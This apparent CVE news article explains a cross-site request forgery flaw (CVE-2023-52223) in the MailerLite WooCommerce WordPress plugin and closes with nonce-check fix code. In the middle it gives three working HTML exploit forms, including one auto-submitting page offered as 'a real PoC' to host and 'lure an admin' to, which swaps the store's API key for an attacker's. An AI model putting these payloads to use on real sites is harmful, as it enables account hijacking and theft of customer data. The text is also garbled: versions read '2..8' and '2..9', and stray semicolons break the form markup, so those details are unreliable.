CVE CyberSecurity Database News

CVE-2023-52223 - Understanding and Exploiting the CSRF Vulnerability in MailerLite – WooCommerce Integration (<= 2..8)

Poster -

In early 2024, a significant Cross-Site Request Forgery (CSRF) vulnerability was disclosed in the MailerLite – WooCommerce integration WordPress plugin, tracked as CVE-2023-52223. This flaw affects all versions up to and including 2..8. CSRF flaws can allow attackers to trick authenticated users (like store admins) into performing unwanted actions, like changing settings or altering data, by just visiting a malicious website.

In this deep dive, we’ll explain how this bug works, how it can be exploited, and what WordPress site owners should do about it.

What is MailerLite – WooCommerce Integration?

MailerLite is a popular email marketing platform. Their WooCommerce integration plugin for WordPress lets store owners automatically sync customers and orders between WooCommerce and MailerLite for email automation, marketing, and segmentation.

What is CSRF Again?

Cross-Site Request Forgery (CSRF) is a web security weakness that lets an attacker make unwanted requests to a web application on behalf of a logged-in user, without their consent. For example, a WooCommerce admin is logged in and visits a malicious web page. That page can send background requests to the WordPress site without the admin realizing!

If a plugin’s settings or actions aren’t properly protected (often using nonces), CSRF attacks become possible.

The Vulnerability (CVE-2023-52223)

CVE-2023-52223 occurs in MailerLite – WooCommerce Integration versions up to 2..8. The plugin failed to properly check WordPress nonces (security tokens) in its settings and some AJAX actions. This means that an attacker could craft a malicious web page that silently makes requests to the victim’s WordPress admin interface.

References

- Wordfence Advisory
- WPScan Advisory
- Official plugin page

The attacker notices that plugin settings can be updated just by sending a POST request to

/wp-admin/admin-post.php

with the right action value (for example, save_mailerlite_settings), but without a valid nonce.

2. Craft the Malicious Form

The attacker builds a simple HTML page with a form that points to the victim’s admin panel (note: the victim must be logged in):

<html>
  <body>
    <form id="attack" method="POST" action="https://victimsite.com/wp-admin/admin-post.php">;
      <input type="hidden" name="action" value="save_mailerlite_settings" />
      <input type="hidden" name="ml_api_key" value="attacker-api-key-here" />
      <input type="hidden" name="some_other_setting" value="attacker-value" />
    </form>
    <script>
      document.getElementById('attack').submit();
    </script>
  </body>
</html>

When the admin visits this page while logged into WordPress, their browser will send this request — and with no nonce check, the plugin updates its settings with attacker-controlled data.

Example: Changing the MailerLite API Key

<form method="POST" action="https://victimsite.com/wp-admin/admin-post.php">;
  <input type="hidden" name="action" value="save_mailerlite_settings" />
  <input type="hidden" name="ml_api_key" value="evil_key_12345" />
  <input type="hidden" name="submit" value="Save" />
  <input type="submit" value="Click me!" />
</form>

This will swap the store’s MailerLite API key to the attacker’s account, allowing them to hijack email data or customer syncs.

Here's a real PoC. Just host this on any web server and lure an admin to click

<!-- Save as mailerlite-csrf.html -->
<!DOCTYPE html>
<html lang="en">
<body>
    <form id="csrf" method="POST" action="https://targetsite.com/wp-admin/admin-post.php">;
        <input type="hidden" name="action" value="save_mailerlite_settings">
        <input type="hidden" name="ml_api_key" value="pwned-api-key">
    </form>
    <script>
        document.getElementById("csrf").submit();
    </script>
</body>
</html>

If the admin is logged in, the plugin will accept the new setting, and the attack is successful.

No indicators: There’s no warning or login required to change the setting.

- Sensitive data: Attackers can redirect all new WooCommerce customers to the attacker’s MailerLite account.

Fix and Recommendations

The plugin maintainers have since released version 2..9 with a fix. The update properly adds nonce validation on all actions.

- Update IMMEDIATELY to version 2..9+

Always use nonces in admin or AJAX actions

// Output a nonce field in forms
wp_nonce_field( 'mailerlite_settings_action', 'mailerlite_settings_nonce' );

// Check on submit
if ( ! isset($_POST['mailerlite_settings_nonce']) || ! wp_verify_nonce( $_POST['mailerlite_settings_nonce'], 'mailerlite_settings_action' ) ) {
    wp_die('Security check failed');
}

Conclusion

CVE-2023-52223 shows how devastating simple CSRF bugs can be — especially in admin plugins. If you use MailerLite’s WooCommerce plugin, update right away. If you’re a plugin developer, always use nonces for settings or anything sensitive.

References (Read More)

- Wordfence Advisory
- WPScan Report
- WordPress Plugin Page
- OWASP: CSRF Explained

Timeline

Published on: 02/28/2024 17:15:07 UTC
Last modified on: 02/29/2024 13:49:47 UTC